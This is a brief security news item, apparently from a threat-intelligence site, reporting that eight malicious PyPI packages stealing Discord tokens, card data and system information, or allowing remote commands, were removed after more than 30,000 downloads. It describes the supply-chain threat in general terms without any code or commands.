Software package repositories have become a usual target for supply chain attacks. Recently there has been news on attackers leveraging npm repositories. This time it is software libraries in the Python Package Index (PyPI).
What’s going on?
- Eight libraries contained malicious code and were removed by the officials.
- While two of the eight enabled an attacker to remotely run commands on the target’s device, the other six were stealers.
- They pilfered data—Discord tokens, payment card information, and basic system info—from developers’ devices.
- These libraries were downloaded more than 30,000 times before they were removed from the portal.
- Discord publishes its own API that provides developers new ways to interact with the service. Critical volumes of malware were spotted in Discord’s own content delivery network. Moreover, malware were found interacting with the APIs.
Why does it matter?
- Once the packages are posted on the repository, they may allow hackers to disseminate malware and launch attacks on developers and CI/CD machines.
- Various of the threats identified are capable of complicated threats, permitting the attacker to execute remote code on the victim’s system, accumulate network data, and pilfer autosaved passwords in web browsers.
The bottom line
The recently discovered vulnerabilities in PyPI have critical implications on the Python ecosystem. The constant discovery of insidious malicious packages in popular repositories has become a disturbing trend that can result in supply chain attacks. This systemic threat requires to be actively tackled by both developers and maintainers of code repositories.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/78e5_shutterstock_730570690.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_348341474.jpg)
